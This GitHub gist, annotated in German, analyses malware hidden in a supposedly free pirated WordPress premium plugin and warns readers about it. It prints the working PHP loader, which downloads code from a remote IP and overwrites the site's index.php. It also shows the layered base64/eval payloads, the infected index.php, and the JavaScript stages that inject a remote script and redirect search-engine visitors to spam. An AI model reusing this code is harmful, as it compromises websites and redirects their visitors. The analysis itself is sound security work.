Skip to content

Instantly share code, notes, and snippets.

@ocean90

ocean90/o1.txt Secret

Last active December 29, 2015 22:49
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ocean90/2e5df9a9430a9a45f0f0 to your computer and use it in GitHub Desktop.
Save ocean90/2e5df9a9430a9a45f0f0 to your computer and use it in GitHub Desktop.
Download ZIP
Analyse des Skriptes zu einem angeblich kostenlosen Premiumplugin. http://blog.wpde.org/?p=2322
Raw
gistfile1.php
<?php
// Aus aioseop_class.php
// $X
/* ------------------------------------------------------------------
Author: Abdul Rahman Sherzad (www.afghancybersoft.com)
Email: info@afghancybersoft.com
Biography: Abdul Rahman Sherzad was born and brought up in Herat-Afghanistan and completed my under-graduate studies
in Computer Science Faculty of Herat University in 2006 obtaining my B.C.S degree as the best outgoing senior student
from this faculty. Having intellectuality in Computer Programming and Information Database Management System, I was offered
to commence teaching in Computer Science Faculty of Herat University. After a while I joined CRS to work as the Database
Manager for the ADA program. I worked for CRS for a couple of years after which I was awarded a scholarship by the
government of Germany to pursue my Master in Information Database Management and Software Engineering in Berlin at
TU-Berlin University. I am currently also teaching at the Herat University as well as acting as the head of Information
Systems Manager both in CRS and Herat University to support the educational needs.
--------------------------------------------------------------------- */
// Erste Zeile
$curl = curl_init('http://91.239.15.61/info.php');
curl_setopt($curl, CURLOPT_FAILONERROR, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($curl);
// Zweite Zeile
$code_txt = 'http://91.239.15.61/o1.txt';
$path = getenv("DOCUMENT_ROOT").'';
if(is_dir($path.'/wp-content') AND is_dir($path.'/wp-admin') AND is_dir($path.'/wp-includes')){
$code= file_get_contents($code_txt);
$index_path = $path.'/index.php';
if(file_put_contents($index_path, $code)){
}
}else{
echo 'Not a wordpress Installation';
}
// http://91.239.15.61/o1.txt
/**
* Fehlende Anführungszeichen.
* Ansonten mehrfach eval(base64_decode(....)):
*
* string(1279) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0RmVEVlBSR2hSVFRCS2Rsa3dSWGRUTUU1WVlrY3hURkl4YjNoWmJURlBUVWRHV0U5WVZsbE5iRmt3V1Zab1QwMUhUalZhTWpWYVRURmFOVmxyV1RWalIwcDBZa1JDUzJWWGRIZFNSa1oyVTIxV00wMUZkRVJWVjNSeVdrWm9TMk13YkVWTlIyUktZbGRuZDFwRmFFSk9hM2cxVDBSV1RsVjZValZVV0hCeVpGVXhWVlpZVms5aGExWXlXVmN4UjAxc2JGUlBWelZwVFdwc2RWbHJaRlprVjA1SVlVaGtTbUZ1VG01U1JrWjJVMnRPVkZWdGNHaFJNRVUxVTFWa1QwMVhUblJsUjFwb1ZucFdkMXBGVG01alJUazFVVmRrUlZWWE9VdFJNVTVUVFVkR1dFMVhlR2xOTVZsM1UxVlJkMW93TlZWak1tUktVVlJDVEZFeFJuTmhiVkpaVTI1T1dVMHdOWE5hUldNMVpESlNSRm95ZEZwTmJXUjZWVlJHVjFVeFVrWlBWa1pYVW1wc1YxWlhkRE5qTUhCSlZtNXNhVkV5Y3pOVFZVVjNVekJPVW1KSGNHdFhSWEI2VjBST1QySkhVa2hQV0dSclVUSmtjbGRVU201ak1VVjRWbXhPVlZKVWJGSldhMWsxVlRGS1YxVnNXbFpoZWxaV1ZsZDBSMVF4VlhkWGExcFdZVmhrTkZNeFVucGFNRkpTWWpCd1JGWXdOSGhaTWpFMFdtMU5lVlpxUW1sTk1FbDNVekJPVTJGdFJrUmxSVkpYVm10d1RsWkVSa05X.Vm1kM1ZHeENWV0Y2VmtkVlZFWlRWbFpPVmsxVldsVk5WbHBXVkVWT1UwMUhSbGhOVjNocFRURlpkMU14VW5wYU1GSlNZakJ3UkZVeFNuSlhWbWhUWVVWc1JVMUhaRnBOTVZvMVdXdFpOV0pIVmtoV2JYQk1VVEZLY1ZsVlRuSk9NR3hFVVZVMVJGb3lkRXRYVkU1WFpWZEtSMDlYY0dsU2VtdzJWMnhPYm1FeGEzbGFNMEpRWlZWR1QxRXlaSEpUYkhCWVZHMDVhV1ZWUm5CVGEyUlRZVWRTU0ZKWGJGQmtla0pNVVRGbmQxUnJUbkJQU0ZwUi5aV3BTVDFFeVkzQkxWSE1wS1RzKSk7));"
* string(942) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRXdTME5YYkcxTFIxb3hZbTFPTUdGWE9YVllNbFkwWVZoT01HTjVaMjVaTTFaNVlrWTVjR0p0YkRCS2VXdHdSRkZ2U21WM01FdERVV3RyWkZoS2MwbEVNR2RKYldnd1pFaEJOa3g1T0RWTlV6UjVUWHByZFUxVVZYVk9ha1YyWVcxR01sbFRPVzVpTWpsdVlrZFZkV05IYUhkSmFuTm5SRkZ2U2tOVFVtcGhRMEU1U1VkT01XTnRlR1poVnpWd1pFTm5jRTk1UVdkRVVXOUtRMU5TTUdGWE1XeGlNMVl3U1VRd1owNVVjMmRKUVRCTFExRnNhbVJZU25OWU0wNXNaRWM1ZDJSRFoydFpNbWR6VVRGV1UxUkZPVkZXUmpsV1ZXdDNjMHBJVm5saVEyczNTVUV3UzBOUmJHcGtXRXB6V0ROT2JHUkhPWGRrUTJkcldUSm5jMUV4VmxOVVJUbFJWa1k1VTFKV1VsWlZhelZWVld0R1QxVXdXa1pWYVhkNFMxUnpaMFJSYjBwRFYwNHhZMjE0Wm1NeVZqQmlNMEl3UzBOU2FtRkRlRVJXVmtwTlZERkNWVmd3VGxCVWF6VkdVVEZTVlZOVk1VWlVNVlpWVEVOU01HRlhNV3hpTTFZd1MxUnpaMFJSYjBwRFUxSnJXVmhTYUVsRU1HZFpNMVo1WWtZNWJHVkhWbXBMUTFKcVlVTnJOMGxEUVU1RFoydEtXVE5XZVdKR09XcGlSemw2V2xObmExa3laM0JQZVVGT1EyZHJTbHBYVG05aWVVRnBTa2RTYUdSSFJXbFBkekJMUTFnd1RrTnBPSFpR.ZWpST1EyY3BLVHMpKTs));"
* string(689) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKEx5ODhQM0JvY0EwS0NXbG1LR1oxYm1OMGFXOXVYMlY0YVhOMGN5Z25ZM1Z5YkY5cGJtbDBKeWtwRFFvSmV3MEtDUWtrZFhKc0lEMGdJbWgwZEhBNkx5ODVNUzR5TXprdU1UVXVOakV2YW1GMllTOW5iMjluYkdVdWNHaHdJanNnRFFvSkNTUmphQ0E5SUdOMWNteGZhVzVwZENncE95QWdEUW9KQ1NSMGFXMWxiM1YwSUQwZ05Uc2dJQTBLQ1FsamRYSnNYM05sZEc5d2RDZ2tZMmdzUTFWU1RFOVFWRjlWVWt3c0pIVnliQ2s3SUEwS0NRbGpkWEpzWDNObGRHOXdkQ2drWTJnc1ExVlNURTlRVkY5U1JWUlZVazVVVWtGT1UwWkZVaXd4S1RzZ0RRb0pDV04xY214ZmMyVjBiM0IwS0NSamFDeERWVkpNVDFCVVgwTlBUazVGUTFSVVNVMUZUMVZVTENSMGFXMWxiM1YwS1RzZ0RRb0pDU1JrWVhSaElEMGdZM1Z5YkY5bGVHVmpLQ1JqYUNrN0lDQU5DZ2tKWTNWeWJGOWpiRzl6WlNna1kyZ3BPeUFOQ2drSlpXTm9ieUFpSkdSaGRHRWlPdzBLQ1gwTkNpOHZQejROQ2cpKTs));"
* string(500) "eval(base64_decode(Ly88P3BocA0KCWlmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpDQoJew0KCQkkdXJsID0gImh0dHA6Ly85MS4yMzkuMTUuNjEvamF2YS9nb29nbGUucGhwIjsgDQoJCSRjaCA9IGN1cmxfaW5pdCgpOyAgDQoJCSR0aW1lb3V0ID0gNTsgIA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9VUkwsJHVybCk7IA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsgDQoJCWN1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCR0aW1lb3V0KTsgDQoJCSRkYXRhID0gY3VybF9leGVjKCRjaCk7ICANCgkJY3VybF9jbG9zZSgkY2gpOyANCgkJZWNobyAiJGRhdGEiOw0KCX0NCi8vPz4NCg));"
* =>
*/
//<?php
if(function_exists('curl_init'))
{
$url = "http://91.239.15.61/java/google.php";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
//?>
Raw
o1.txt
<?php ob_start(); ?>
<? eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUm1WRVZsQlNSMmhTVkZSQ1MyUnNhM2RTV0dSVVRVVTFXVmxyWTNoVVJrbDRZak5vV21KVVJsQlVWV1JIVjBVNVdWWnNiRTVpUm10M1YxWmFiMVF3TVVoVWFsWmhUV3BXWVZSVVJtRk9WbXh5VjFSV2FsSXdjREJaYTFKRFV6SldXR1JJWkZOU2Exb3lWVEl4VjAwd01VWmtSVkpXVmpOU2VWZHJXbTlUTWsxM1lrVldUbEl5VWt0WmJHUnVaREZ3Um1GRlNrOWhNMmN4VkRCU1YxUnNWalpWYWxaVlYwaENlVnBHVlhoV1ZscFpWbXM1YUdFeFdYbFhWbU40VWpBeGMySkdVbEJXZWxad1ZGZHdjMlJXYkhKYVJscHJWakExU1ZsVmFHdFRiVVoxVkcwMVUxSnJXakpWTW5SUFZrWldkR05IYUZKTlJWVXhWVEZXYTFRd01WaFVibEpzVWpGd2IxWnVjRmRrTVhCR1ZHMDFhbEpVYXpGVlZtUnJVbFpXV0U5VmRGSk5WVFZVVkZWa1IxZEZNVmhsUjJ4T1RWWnNNMVV4VmxKa01XOTNUbFpXYWsxdFVrdFZWbEpEVkVaRmVGSnVUbWhpVmtwYVZUSTFUMWRWTUhkT1dFNWhVbGROTVZwRVNsTlNSbTk1WkVad1RtSlhValpXVmxKSFZqRlZlRlZyV2xCV2ExcFlWVzF3YzFZeFdsaGtSRTVxVFVoQ1NsWnROWE5o.VmtWNVkzcE9WRlpWVmpOVmVrSlBWVzFLU0dOSGRGaFNXRUkyVmpCU1QxUXlTa2hWYTJoUVYwZFNjbFZVU210amJHUlZVMjAxYWsxVlZqUldiWGhQVmxaS1ZXSkdTbGRoTVdzeFZsUkdTMVl4Vm5OWGJGcG9aV3hhVjFac1pEQlNNVkY0Vmxoa1dHRXhjRmRaVm1oclRrWk5lRlZ1Y0dGTlJrcFRXV3BDZDFKR1dYZE9TR2hhVFdwRk1GZHRNVTVsVmxweFVXMXNUazFGYkROVmVrSlBWVEpHZEZKclVteFNWa3BZVm0xMGQxUnNXa1ZTYTA1WC5WbTFrTTFaSGVFTldWMFkyVm10a1ZsWkZXbFJXYkZwUFZtc3hWbGRzVms1V2JIQlhWa1ZXVDFVd01VaFNiR2hPVmpOb2NGUlVSbHBrTVUxNFZXNXdZVTFHU2xOWmFrSjNVa1pWZUZOdVNsaFdiV2hVV1ZWV2MxSlZNVWhhUm5CT1RWWnZNVmRYZEZwT1YwcElWbXRvVjJKWVFrMVZWRVpMWTFac1ZsUnVTazlOUjNoRlZWWlZNVkpHYjNsa1JYUllWa1UxV0ZwV1pFdFNNRGxZWTBkc1UyVnRkekpXTW5oUFltMUZlR0V6YkdGTk1FcFJXbFpXUjFReFJYbGFTRXBVWWtoQ1dWWkhNRFZoVjFaV1VtNUNWR0V5VWxSWlZXUlRVMFpLV0dKR1FtdGxhMHBOVlZSR2JtUXhVbkpVYmtKUVUwWndVaTVhVjNCVFZERkZlVmt6UWt4V1NFMXdTMVJ6S1NrNykpOw)); ?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
@catlauraherzog
Copy link

Das steht in der google.php:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script type="text/javascript">
<!--
function redirect()
{
var thecookie = readCookie('doRedirect');
if(!thecookie)
{
     var head=document.getElementsByTagName('head')[0]
      var script=document.createElement('script')
       script.setAttribute('type', 'text/javascript')
       script.setAttribute('src', "http://91.239.15.61/google.js")
       head.appendChild(script)
}
}

function createCookie(name,value,days)
{
if (days)
{
var date = new Date();
date.setTime(date.getTime()+(days*3600*3600*3600*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name)
{
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++)
{
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

window.onload = function()
{
redirect();
createCookie('doRedirect','true','999');
}
//-->
</script>
</head>

<body>
</body>
</html>

@catlauraherzog
Copy link

Und das in der google.js

    var from = document.referrer;
    var i;
    var se = ["google", "yahoo", "bing", "yandex" , "baidu", "gigablast", "soso", "blekko", "exalead", "sogou", "duckduckgo", "volunia"];
    for (i = 0; i < se.length; ++i) {
        if (from.indexOf(se[i]) + 1) {
            if (!checkCookie()) {
                window.location = "http://91.239.15.61/g.php";
            }
        }
    }

    function getCookie(c_name) {
        var c_value = document.cookie;
        var c_start = c_value.indexOf(" " + c_name + "=");
        if (c_start == -1) {
            c_start = c_value.indexOf(c_name + "=");
        }
        if (c_start == -1) {
            c_value = null;
        }
        else {
            c_start = c_value.indexOf("=", c_start) + 1;
            var c_end = c_value.indexOf(";", c_start);
            if (c_end == -1) {
                c_end = c_value.length;
            }
            c_value = unescape(c_value.substring(c_start, c_end));
        }
        return c_value;
    }

    function setCookie(c_name, value, exdays) {
        var exdate = new Date();
        exdate.setDate(exdate.getDate() + exdays);
        var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
        document.cookie = c_name + "=" + c_value;
    }

    function checkCookie() {
        var referrerRedirectCookie = getCookie("referrerRedirectCookie");
        if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
            return true;
        }
        else {
            setCookie("referrerRedirectCookie", "do not redirect", 730);
            return false;
        }
    }

Die http://91.239.15.61/g.php sollte nicht aufgerufen werden. Das ist Porn-Spam.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment